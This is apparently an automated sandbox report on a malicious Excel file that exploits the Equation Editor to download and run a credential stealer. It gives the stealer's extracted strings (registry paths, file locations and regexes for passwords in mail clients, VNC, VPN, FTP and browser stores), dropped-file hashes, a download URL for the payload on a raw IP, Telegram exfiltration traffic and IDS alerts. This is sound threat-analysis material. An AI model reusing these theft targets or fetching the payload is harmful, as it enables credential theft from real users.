Trillian
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Email
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Outlook
COMPlus_legacyCorruptedStateExceptionsPolicy
1
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
Windows Mail App
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\mail\
\VirtualStore\Program Files\Foxmail\mail\
\VirtualStore\Program Files (x86)\Foxmail\mail\
\Accounts\Account.rec0
\Account.stg
Read
Dispose
POP3Host
SMTPHost
IncomingServer
POP3Password
Foxmail
\Opera Mail\Opera Mail\wand.dat
opera:
Opera Mail
\Pocomail\accounts.ini
POPPass
SMTPPass
SMTP
PocoMail
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
SOFTWARE\RealVNC\WinVNC4
Software\ORL\WinVNC3
TightVNC
Software\TightVNC\Server
PasswordViewOnly
TightVNC ControlPassword
ControlPassword
TigerVNC
Software\TigerVNC\Server
Trim
UltraVNC
ProgramFiles(x86)
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
Substring
eM Client\accounts.dat
eM Client
"Username":"
",
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
Mailbird
SenderIdentities
NordVPN
NordVPN directory not found!
NordVpn.exe*
user.config
Load
SelectSingleNode
//setting[@name='Username']/value
InnerText
//setting[@name='Password']/value
\MySQL\Workbench\workbench_user_data.dat


MySQL Workbench
%ProgramW6432%
Private Internet Access\data
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
Private Internet Access
Software\DownloadManager\Passwords\
EncPassword
Internet Download Manager
hdfzpysvpzimorhk
quick.dat
Sites.dat
\FlashFXP\
yA36zA48dEhfrvghGRg57h5UlDv3
Type
Value
IterationCount
\Psi\profiles
\Psi+\profiles
\accounts.xml
USERPROFILE
\OpenVPN\config\
remote
PWD=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
5A
71
abcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
o6806642kbM7c5
<array>
<dict>
<string>
</string>
<data>
</data>
Safari Browser
-convert xml1 -s -o "
\fixed_keychain.xml"
A
10
B
11
12
D
13
E
14
F
15
ABCDEF
(
EndsWith
)
IndexOf
UNIQUE
table
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
key4.db
metaData
id
item1
item2
nssPrivate
a11
a102
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
[^\u0020-\u007F]
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
;
Total events
5 318
Read events
5 201
Write events
106
Delete events
11

Modification events

(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:+g2
Value:
2B67320010040000010000000000000000000000
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(1040) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
2
Suspicious files
0
Text files
0
Unknown types
4

Dropped files

PID
Process
Filename
Type
1040EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR1B2B.tmp.cvr
MD5:
SHA256:
1040EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC934544.emfemf
MD5:894A796F9211E1080192AC72B6D54A9D
SHA256:8232CC0DF629D8D89A7155A1793B35D611073D60F2BEEC4BABBF78179978B71A
1808EQNEDT32.EXEC:\Users\Public\vbc.exeexecutable
MD5:D29958FFC3EBDE050E992FE24B7D735A
SHA256:75F2FF197BF14319CFA73C515597453F6A50D56CE2FE39C384F445B3431A9960
1808EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\PO[1].exeexecutable
MD5:D29958FFC3EBDE050E992FE24B7D735A
SHA256:75F2FF197BF14319CFA73C515597453F6A50D56CE2FE39C384F445B3431A9960
1040EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1C3548F.emfemf
MD5:8E3A74F7AA420B02D34C69E625969C0A
SHA256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
556vbc.exeC:\Users\admin\AppData\Roaming\job4qj0z.nny\Chrome\Default\Cookiessqlite
MD5:B8E63E7225C9F4E0A81371F29D6456D8
SHA256:35A6919CE60EA8E0A44934F8B267BDE2C5A063C2E32F22D34724F168C43150C8
556vbc.exeC:\Users\admin\AppData\Roaming\job4qj0z.nny\Firefox\Profiles\qldyz51w.default\cookies.sqlitesqlite
MD5:23D08A78BC908C0B29E9800D3D5614E7
SHA256:F6BD7DF5DFAE9FD88811A807DBA14085E00C1B5A6D7CC3D06CC68F6015363D59
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1808
EQNEDT32.EXE
GET
200
198.12.89.141:80
http://198.12.89.141/PO.exe
US
executable
680 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
556
vbc.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger LLP
GB
malicious
1808
EQNEDT32.EXE
198.12.89.141:80
ColoCrossing
US
suspicious

DNS requests

Domain
IP
Reputation
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
1808
EQNEDT32.EXE
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
1808
EQNEDT32.EXE
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
1808
EQNEDT32.EXE
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1808
EQNEDT32.EXE
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
1808
EQNEDT32.EXE
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
Misc activity
ET INFO Telegram API Domain in DNS Lookup
556
vbc.exe
Misc activity
ET INFO Observed Telegram API Domain (api .telegram .org in TLS SNI)
556
vbc.exe
Misc activity
ET POLICY Telegram API Certificate Observed
No debug info